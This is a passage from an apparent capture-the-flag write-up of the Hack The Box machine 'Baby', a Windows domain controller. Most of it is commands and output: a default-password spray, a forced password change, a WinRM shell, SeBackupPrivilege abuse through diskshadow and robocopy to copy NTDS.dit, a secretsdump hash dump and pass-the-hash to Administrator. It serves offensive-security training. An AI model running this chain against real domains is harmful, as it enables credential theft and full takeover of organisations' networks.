SMB 10.129.20.55 445 BABYDC [-] baby.vl\Hugh.George:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.20.55 445 BABYDC [-] baby.vl\Jacqueline.Barnett:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.20.55 445 BABYDC [-] baby.vl\Joseph.Hughes:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.20.55 445 BABYDC [-] baby.vl\Kerry.Wilson:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.20.55 445 BABYDC [-] baby.vl\Leonard.Dyer:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.20.55 445 BABYDC [-] baby.vl\Teresa.Bell:BabyStart123! STATUS_LOGON_FAILURE
No matches.
Password Spray Success
Looking at the LDAP data, there’s a user who didn’t make my list when I search for objectClass=*:
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Caroline Robinson,OU=it,DC=baby,DC=vl
That’s because this user doesn’t have any data associated with them. But I can try to use the potential default password with them:
oxdf@hacky$ netexec smb BABYDC.baby.vl -u Caroline.Robinson -p 'BabyStart123!'
SMB 10.129.20.55 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB 10.129.20.55 445 BABYDC [-] baby.vl\Caroline.Robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE
It fails, but in a way that say the password was correct, but that it must change!
Shell
Password Change
I’ll use the netexec module change-password to update Caroline.Robinson’s password. There is a password complexity requirement:
oxdf@hacky$ netexec smb BABYDC.baby.vl -u Caroline.Robinson -p 'BabyStart123!' -M change-password -o NEWPASS=0xdf0xdf
SMB 10.129.20.55 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB 10.129.20.55 445 BABYDC [-] baby.vl\Caroline.Robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE
CHANGE-P... 10.129.20.55 445 BABYDC [-] SMB-SAMR password change failed: SAMR SessionError: code: 0xc000006c - STATUS_PASSWORD_RESTRICTION - When trying to update a password, this status indicates that some password update rule has been violated. For example, the password may not meet length criteria.
A more complex password works:
oxdf@hacky$ netexec smb BABYDC.baby.vl -u Caroline.Robinson -p 'BabyStart123!' -M change-password -o NEWPASS=0xdf0xdf....
SMB 10.129.20.55 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB 10.129.20.55 445 BABYDC [-] baby.vl\Caroline.Robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE
CHANGE-P... 10.129.20.55 445 BABYDC [+] Successfully changed password for Caroline.Robinson
Now I can list the password policy:
oxdf@hacky$ netexec smb BABYDC.baby.vl -u Caroline.Robinson -p 0xdf0xdf.... --pass-pol
SMB 10.129.20.55 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB 10.129.20.55 445 BABYDC [+] baby.vl\Caroline.Robinson:0xdf0xdf....
SMB 10.129.20.55 445 BABYDC [+] Dumping password info for domain: BABY
SMB 10.129.20.55 445 BABYDC Minimum password length: 7
SMB 10.129.20.55 445 BABYDC Password history length: 24
SMB 10.129.20.55 445 BABYDC Maximum password age: 41 days 23 hours 53 minutes
SMB 10.129.20.55 445 BABYDC
SMB 10.129.20.55 445 BABYDC Password Complexity Flags: 000001
SMB 10.129.20.55 445 BABYDC Domain Refuse Password Change: 0
SMB 10.129.20.55 445 BABYDC Domain Password Store Cleartext: 0
SMB 10.129.20.55 445 BABYDC Domain Password Lockout Admins: 0
SMB 10.129.20.55 445 BABYDC Domain Password No Clear Change: 0
SMB 10.129.20.55 445 BABYDC Domain Password No Anon Change: 0
SMB 10.129.20.55 445 BABYDC Domain Password Complex: 1
SMB 10.129.20.55 445 BABYDC
SMB 10.129.20.55 445 BABYDC Minimum password age: 1 day 4 minutes
SMB 10.129.20.55 445 BABYDC Reset Account Lockout Counter: 30 minutes
SMB 10.129.20.55 445 BABYDC Locked Account Duration: 30 minutes
SMB 10.129.20.55 445 BABYDC Account Lockout Threshold: None
SMB 10.129.20.55 445 BABYDC Forced Log off Time: Not Set
“0xdf0xdf” failed the “Domain Password Complex: 1”, which means there must be at least three of upper, lower, digit, and special, but this only has digit and lower.
WinRM
The new password works over WinRM:
oxdf@hacky$ netexec winrm BABYDC.baby.vl -u Caroline.Robinson -p 0xdf0xdf....
WINRM 10.129.20.55 5985 BABYDC [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl)
WINRM 10.129.20.55 5985 BABYDC [+] baby.vl\Caroline.Robinson:0xdf0xdf.... (Pwn3d!)
I’ll get a shell with evil-winrm-py:
oxdf@hacky$ evil-winrm-py -i BABYDC.baby.vl -u Caroline.Robinson -p 0xdf0xdf....
_ _ _
_____ _(_| |_____ __ _(_)_ _ _ _ _ __ ___ _ __ _ _
/ -_\ V | | |___\ V V | | ' \| '_| ' |___| '_ | || |
\___|\_/|_|_| \_/\_/|_|_||_|_| |_|_|_| | .__/\_, |
|_| |__/ v1.4.1
[*] Connecting to 'BABYDC.baby.vl:5985' as 'Caroline.Robinson'
evil-winrm-py PS C:\Users\Caroline.Robinson\Documents>
And grab user.txt:
evil-winrm-py PS C:\Users\Caroline.Robinson\Desktop> cat user.txt
79bb144d************************
Shell as Administrator
Enumeration
There are no other interesting users in C:\Users:
evil-winrm-py PS C:\Users> ls
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 10/4/2024 3:33 PM Administrator
d----- 7/27/2024 10:27 PM Caroline.Robinson
d-r--- 11/21/2021 3:29 PM Public
Unusually, Caroline.Robinson can list files in the Administrator user’s home directory:
evil-winrm-py PS C:\Users> tree /f .
Folder PATH listing
Volume serial number is 00000264 7DCD:94E1
C:\USERS
+---Administrator
¦ +---3D Objects
¦ +---Contacts
¦ +---Desktop
¦ ¦ root.txt
¦ ¦
¦ +---Documents
¦ +---Downloads
¦ +---Favorites
¦ ¦ ¦ Bing.url
¦ ¦ ¦
¦ ¦ +---Links
¦ +---Links
¦ ¦ Desktop.lnk
¦ ¦ Downloads.lnk
¦ ¦
¦ +---Music
¦ +---Pictures
¦ +---Saved Games
¦ +---Searches
¦ +---Videos
+---Caroline.Robinson
¦ +---Desktop
¦ ¦ user.txt
¦ ¦
¦ +---Documents
¦ +---Downloads
¦ +---Favorites
¦ +---Links
¦ +---Music
¦ +---Pictures
¦ +---Saved Games
¦ +---Videos
+---Public
+---Documents
+---Downloads
+---Music
+---Pictures
+---Videos
They can’t access root.txt:
evil-winrm-py PS C:\Users\Administrator\Desktop> type root.txt
Access to the path 'C:\Users\Administrator\Desktop\root.txt' is denied.
Caroline.Robinson is in the well-known Microsoft group, Backup Operators:
evil-winrm-py PS C:\> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
BABY\it Group S-1-5-21-1407081343-4001094062-1444647654-1109 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
Being in this group gives SeBackupPrivilege and SeRestorePrivielge:
evil-winrm-py PS C:\> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Exploit SeBackupPrivilege
Local Hashes
I have shown exploitation of SeBackupPrivilege several times before, most recently in Cicada. I’ll follow the same path here. I’ll use reg.py from my host to make a backup of the registry hive files:
oxdf@hacky$ reg.py
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[!] Cannot check RemoteRegistry status. Triggering start trough named pipe...
[*] Saved HKLM\SAM to C:\windows\temp\SAM.save
[*] Saved HKLM\SYSTEM to C:\windows\temp\SYSTEM.save
[*] Saved HKLM\SECURITY to C:\windows\temp\SECURITY.save
I’m backing them up on Baby. In theory I can do this onto a SMB share I control, but I’ve found that to be unstable. Now I’ll download the files using evil-winrm-py:
evil-winrm-py PS C:\windows\temp> download SAM.save SAM.save
Downloading C:\windows\temp\SAM.save: 64.0kB [00:00, 371MB/s]
[+] File downloaded successfully and saved as: /media/sf_CTFs/hackthebox/baby-10.129.20.55/SAM.save
evil-winrm-py PS C:\windows\temp> download SECURITY.save SECURITY.save
Downloading C:\windows\temp\SECURITY.save: 64.0kB [00:00, 337MB/s]
[+] File downloaded successfully and saved as: /media/sf_CTFs/hackthebox/baby-10.129.20.55/SECURITY.save
evil-winrm-py PS C:\windows\temp> download SYSTEM.save SYSTEM.save
Downloading C:\windows\temp\SYSTEM.save: 19.9MB [00:08, 2.40MB/s]
[+] File downloaded successfully and saved as: /media/sf_CTFs/hackthebox/baby-10.129.20.55/SYSTEM.save
I’ll dump the hashes from these using secretsdump.py:
oxdf@hacky$ secretsdump.py -sam SAM.save -system SYSTEM.save LOCAL
[*] Target system bootKey: 0x191d5d3fd5b0b51888453de8541d7e88
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8d992faed38128ae85e95fa35868bb43:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...
Unfortunately, this hash doesn’t work:
oxdf@hacky$ netexec smb BABYDC.baby.vl -u Administrator -H 8d992faed38128ae85e95fa35868bb43
SMB 10.129.20.55 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB 10.129.20.55 445 BABYDC [-] baby.vl\Administrator:8d992faed38128ae85e95fa35868bb43 STATUS_LOGON_FAILURE
Domain Hashes
To dump the domain hashes, I’ll want to get the C:\Windows\NTDS.dit file. Unfortunately, this file can’t just be copied as it is locked and in use. I can access it via a shadow copy, which I’ll generate with diskshadow and this script:
set verbose on
set context persistent nowriters
set metadata C:\Windows\Temp\0xdf.cab
add volume c: alias 0xdf
create
expose %0xdf% e:
I’ll save this and convert it to Windows newlines:
oxdf@hacky$ vim backup
oxdf@hacky$ unix2dos backup
unix2dos: converting file backup to DOS format...
I’ll upload it to Baby over evil-winrm-py and pass it to diskshadow:
evil-winrm-py PS C:\programdata> diskshadow /s C:\programdata\backup
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: BABYDC, 9/19/2025 11:12:18 AM
-> set verbose on
-> set context persistent nowriters
-> set metadata C:\Windows\Temp\0xdf.cab
-> add volume c: alias 0xdf
-> create
Alias 0xdf for shadow ID {80e56935-d434-4518-bfa8-74886732b972} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {760373e3-c2df-46da-8fc5-a8cd3290262f} set as environment variable.
Inserted file Manifest.xml into .cab file 0xdf.cab
Inserted file Dis6D42.tmp into .cab file 0xdf.cab
Querying all shadow copies with the shadow copy set ID {760373e3-c2df-46da-8fc5-a8cd3290262f}
* Shadow copy ID = {80e56935-d434-4518-bfa8-74886732b972} %0xdf%
- Shadow copy set: {760373e3-c2df-46da-8fc5-a8cd3290262f} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{711fc68a-0000-0000-0000-100000000000}\ [C:\]
- Creation time: 9/19/2025 11:12:19 AM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- Originating machine: BabyDC.baby.vl
- Service machine: BabyDC.baby.vl
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential
Number of shadow copies listed: 1
-> expose %0xdf% e:
-> %0xdf% = {80e56935-d434-4518-bfa8-74886732b972}
The shadow copy was successfully exposed as e:\.
->
Now there’s a copy of the C: drive at E::
evil-winrm-py PS C:\programdata> ls E:\
Directory: E:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 8/19/2021 6:24 AM EFI
d----- 4/16/2025 9:17 AM inetpub
d----- 5/8/2021 8:20 AM PerfLogs
d-r--- 4/16/2025 8:35 AM Program Files
d----- 4/16/2025 9:38 AM Program Files (x86)
d-r--- 7/27/2024 10:27 PM Users
d----- 8/20/2025 9:07 AM Windows
I’ll use robocopy to get the NTDS.dit file out:
evil-winrm-py PS C:\programdata> robocopy /b E:\Windows\ntds . ntds.dit
-------------------------------------------------------------------------------
ROBOCOPY :: Robust File Copy for Windows
-------------------------------------------------------------------------------
Started : Friday, September 19, 2025 11:12:24 AM
Source : E:\Windows\ntds\
Dest : C:\programdata\
Files : ntds.dit
Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30
------------------------------------------------------------------------------
1 E:\Windows\ntds\
New File 16.0 m ntds.dit
0.0%
0.3%
0.7%
1.1%
1.5%
1.9%
2.3%
2.7%
3.1%
3.5%
3.9%
4.2%
4.6%
5.0%
5.4%
5.8%
6.2%
6.6%
7.0%
7.4%
7.8%
8.2%
8.5%
8.9%
9.3%
9.7%
10.1%
10.5%
10.9%
11.3%
11.7%
12.1%
12.5%
12.8%
13.2%
13.6%
14.0%
14.4%
14.8%
15.2%
15.6%
16.0%
16.4%
16.7%
17.1%
17.5%
17.9%
18.3%
18.7%
19.1%
19.5%
19.9%
20.3%
20.7%
21.0%
21.4%
21.8%
22.2%
22.6%
23.0%
23.4%
23.8%
24.2%
24.6%
25.0%
25.3%
25.7%
26.1%
26.5%
26.9%
27.3%
27.7%
28.1%
28.5%
28.9%
29.2%
29.6%
30.0%
30.4%
30.8%
31.2%
31.6%
32.0%
32.4%
32.8%
33.2%
33.5%
33.9%
34.3%
34.7%
35.1%
35.5%
35.9%
36.3%
36.7%
37.1%
37.5%
37.8%
38.2%
38.6%
39.0%
39.4%
39.8%
40.2%
40.6%
41.0%
41.4%
41.7%
42.1%
42.5%
42.9%
43.3%
43.7%
44.1%
44.5%
44.9%
45.3%
45.7%
46.0%
46.4%
46.8%
47.2%
47.6%
48.0%
48.4%
48.8%
49.2%
49.6%
50.0%
50.3%
50.7%
51.1%
51.5%
51.9%
52.3%
52.7%
53.1%
53.5%
53.9%
54.2%
54.6%
55.0%
55.4%
55.8%
56.2%
56.6%
57.0%
57.4%
57.8%
58.2%
58.5%
58.9%
59.3%
59.7%
60.1%
60.5%
60.9%
61.3%
61.7%
62.1%
62.5%
62.8%
63.2%
63.6%
64.0%
64.4%
64.8%
65.2%
65.6%
66.0%
66.4%
66.7%
67.1%
67.5%
67.9%
68.3%
68.7%
69.1%
69.5%
69.9%
70.3%
70.7%
71.0%
71.4%
71.8%
72.2%
72.6%
73.0%
73.4%
73.8%
74.2%
74.6%
75.0%
75.3%
75.7%
76.1%
76.5%
76.9%
77.3%
77.7%
78.1%
78.5%
78.9%
79.2%
79.6%
80.0%
80.4%
80.8%
81.2%
81.6%
82.0%
82.4%
82.8%
83.2%
83.5%
83.9%
84.3%
84.7%
85.1%
85.5%
85.9%
86.3%
86.7%
87.1%
87.5%
87.8%
88.2%
88.6%
89.0%
89.4%
89.8%
90.2%
90.6%
91.0%
91.4%
91.7%
92.1%
92.5%
92.9%
93.3%
93.7%
94.1%
94.5%
94.9%
95.3%
95.7%
96.0%
96.4%
96.8%
97.2%
97.6%
98.0%
98.4%
98.8%
99.2%
99.6%
100%
100%
------------------------------------------------------------------------------
Total Copied Skipped Mismatch FAILED Extras
Dirs : 1 0 1 0 0 0
Files : 1 1 0 0 0 0
Bytes : 16.00 m 16.00 m 0 0 0 0
Times : 0:00:00 0:00:00 0:00:00 0:00:00
Speed : 178,481,021 Bytes/sec.
Speed : 10,212.766 MegaBytes/min.
Ended : Friday, September 19, 2025 11:12:24 AM
Now it’s in programdata, where I can download a copy:
evil-winrm-py PS C:\programdata> ls ntds.dit
Directory: C:\programdata
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/19/2025 11:08 AM 16777216 ntds.dit
evil-winrm-py PS C:\programdata> download ntds.dit ntds.dit
Downloading C:\programdata\ntds.dit: 100%|████████████████████████████████████████████████████████| 16.0M/16.0M [00:05<00:00, 3.04MB/s]
[+] File downloaded successfully and saved as: /media/sf_CTFs/hackthebox/baby-10.129.20.55/ntds.dit
I’ll dump hashes from this using secretsdump.py:
oxdf@hacky$ secretsdump.py -ntds ntds.dit -system SYSTEM.save LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x191d5d3fd5b0b51888453de8541d7e88
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 41d56bf9b458d01951f592ee4ba00ea6
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ee4457ae59f1e3fbd764e33d9cef123d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
BABYDC$:1000:aad3b435b51404eeaad3b435b51404ee:3d538eabff6633b62dbaa5fb5ade3b4d:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6da4842e8c24b99ad21a92d620893884:::
baby.vl\Jacqueline.Barnett:1104:aad3b435b51404eeaad3b435b51404ee:20b8853f7aa61297bfbc5ed2ab34aed8:::
baby.vl\Ashley.Webb:1105:aad3b435b51404eeaad3b435b51404ee:02e8841e1a2c6c0fa1f0becac4161f89:::
baby.vl\Hugh.George:1106:aad3b435b51404eeaad3b435b51404ee:f0082574cc663783afdbc8f35b6da3a1:::
baby.vl\Leonard.Dyer:1107:aad3b435b51404eeaad3b435b51404ee:b3b2f9c6640566d13bf25ac448f560d2:::
baby.vl\Ian.Walker:1108:aad3b435b51404eeaad3b435b51404ee:0e440fd30bebc2c524eaaed6b17bcd5c:::
baby.vl\Connor.Wilkinson:1110:aad3b435b51404eeaad3b435b51404ee:e125345993f6258861fb184f1a8522c9:::
baby.vl\Joseph.Hughes:1112:aad3b435b51404eeaad3b435b51404ee:31f12d52063773769e2ea5723e78f17f:::
baby.vl\Kerry.Wilson:1113:aad3b435b51404eeaad3b435b51404ee:181154d0dbea8cc061731803e601d1e4:::
baby.vl\Teresa.Bell:1114:aad3b435b51404eeaad3b435b51404ee:7735283d187b758f45c0565e22dc20d8:::
baby.vl\Caroline.Robinson:1115:aad3b435b51404eeaad3b435b51404ee:5fa67a134024d41bb4ff8bfd7da5e2b5:::
[*] Kerberos keys from ntds.dit
Administrator:aes256-cts-hmac-sha1-96:ad08cbabedff5acb70049bef721524a23375708cadefcb788704ba00926944f4
Administrator:aes128-cts-hmac-sha1-96:ac7aa518b36d5ea26de83c8d6aa6714d
Administrator:des-cbc-md5:d38cb994ae806b97
BABYDC$:aes256-cts-hmac-sha1-96:1a7d22edfaf3a8083f96a0270da971b4a42822181db117cf98c68c8f76bcf192
BABYDC$:aes128-cts-hmac-sha1-96:406b057cd3a92a9cc719f23b0821a45b
BABYDC$:des-cbc-md5:8fef68979223d645
krbtgt:aes256-cts-hmac-sha1-96:9c578fe1635da9e96eb60ad29e4e4ad90fdd471ea4dff40c0c4fce290a313d97
krbtgt:aes128-cts-hmac-sha1-96:1541c9f79887b4305064ddae9ba09e14
krbtgt:des-cbc-md5:d57383f1b3130de5
baby.vl\Jacqueline.Barnett:aes256-cts-hmac-sha1-96:851185add791f50bcdc027e0a0385eadaa68ac1ca127180a7183432f8260e084
baby.vl\Jacqueline.Barnett:aes128-cts-hmac-sha1-96:3abb8a49cf283f5b443acb239fd6f032
baby.vl\Jacqueline.Barnett:des-cbc-md5:01df1349548a206b
baby.vl\Ashley.Webb:aes256-cts-hmac-sha1-96:fc119502b9384a8aa6aff3ad659aa63bab9ebb37b87564303035357d10fa1039
baby.vl\Ashley.Webb:aes128-cts-hmac-sha1-96:81f5f99fd72fadd005a218b96bf17528
baby.vl\Ashley.Webb:des-cbc-md5:9267976186c1320e
baby.vl\Hugh.George:aes256-cts-hmac-sha1-96:0ea359386edf3512d71d3a3a2797a75db3168d8002a6929fd242eb7503f54258
baby.vl\Hugh.George:aes128-cts-hmac-sha1-96:50b966bdf7c919bfe8e85324424833dc
baby.vl\Hugh.George:des-cbc-md5:296bec86fd323b3e
baby.vl\Leonard.Dyer:aes256-cts-hmac-sha1-96:6d8fd945f9514fe7a8bbb11da8129a6e031fb504aa82ba1e053b6f51b70fdddd
baby.vl\Leonard.Dyer:aes128-cts-hmac-sha1-96:35fd9954c003efb73ded2fde9fc00d5a
baby.vl\Leonard.Dyer:des-cbc-md5:022313dce9a252c7
baby.vl\Ian.Walker:aes256-cts-hmac-sha1-96:54affe14ed4e79d9c2ba61713ef437c458f1f517794663543097ff1c2ae8a784
baby.vl\Ian.Walker:aes128-cts-hmac-sha1-96:78dbf35d77f29de5b7505ee88aef23df
baby.vl\Ian.Walker:des-cbc-md5:bcb094c2012f914c
baby.vl\Connor.Wilkinson:aes256-cts-hmac-sha1-96:55b0af76098dfe3731550e04baf1f7cb5b6da00de24c3f0908f4b2a2ea44475e
baby.vl\Connor.Wilkinson:aes128-cts-hmac-sha1-96:9d4af8203b2f9e3ecf64c1cbbcf8616b
baby.vl\Connor.Wilkinson:des-cbc-md5:fda762e362ab7ad3
baby.vl\Joseph.Hughes:aes256-cts-hmac-sha1-96:2e5f25b14f3439bfc901d37f6c9e4dba4b5aca8b7d944957651655477d440d41
baby.vl\Joseph.Hughes:aes128-cts-hmac-sha1-96:39fa92e8012f1b3f7be63c7ca9fd6723
baby.vl\Joseph.Hughes:des-cbc-md5:02f1cd9e52e0f245
baby.vl\Kerry.Wilson:aes256-cts-hmac-sha1-96:db5f7da80e369ee269cd5b0dbaea74bf7f7c4dfb3673039e9e119bd5518ea0fb
baby.vl\Kerry.Wilson:aes128-cts-hmac-sha1-96:aebbe6f21c76460feeebea188affbe01
baby.vl\Kerry.Wilson:des-cbc-md5:1f191c8c49ce07fe
baby.vl\Teresa.Bell:aes256-cts-hmac-sha1-96:8bb9cf1637d547b31993d9b0391aa9f771633c8f2ed8dd7a71f2ee5b5c58fc84
baby.vl\Teresa.Bell:aes128-cts-hmac-sha1-96:99bf021e937e1291cc0b6e4d01d96c66
baby.vl\Teresa.Bell:des-cbc-md5:4cbcdc3de6b50ee9
baby.vl\Caroline.Robinson:aes256-cts-hmac-sha1-96:6fe5d46e01d6cf9909f479fb4d7afac0bd973981dd958e730a734aa82c9e13af
baby.vl\Caroline.Robinson:aes128-cts-hmac-sha1-96:f34e6c0c8686a46eea8fd15a361601f9
baby.vl\Caroline.Robinson:des-cbc-md5:fd40190d579138df
[*] Cleaning up...
There’s a different Administrator hash!
Shell
The new hash works for the Administrator account on Baby:
oxdf@hacky$ netexec smb BABYDC.baby.vl -u Administrator -H ee4457ae59f1e3fbd764e33d9cef123d
SMB 10.129.20.55 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB 10.129.20.55 445 BABYDC [+] baby.vl\Administrator:ee4457ae59f1e3fbd764e33d9cef123d (Pwn3d!)
I’ll get a shell:
oxdf@hacky$ evil-winrm-py -i BABYDC.baby.vl -u Administrator -H ee4457ae59f1e3fbd764e33d9cef123d
_ _ _
_____ _(_| |_____ __ _(_)_ _ _ _ _ __ ___ _ __ _ _
/ -_\ V | | |___\ V V | | ' \| '_| ' |___| '_ | || |
\___|\_/|_|_| \_/\_/|_|_||_|_| |_|_|_| | .__/\_, |
|_| |__/ v1.4.1
[*] Connecting to 'BABYDC.baby.vl:5985' as 'Administrator'
evil-winrm-py PS C:\Users\Administrator\Documents>
And the root flag:
evil-winrm-py PS C:\Users\Administrator\Desktop> cat root.txt
6083544b************************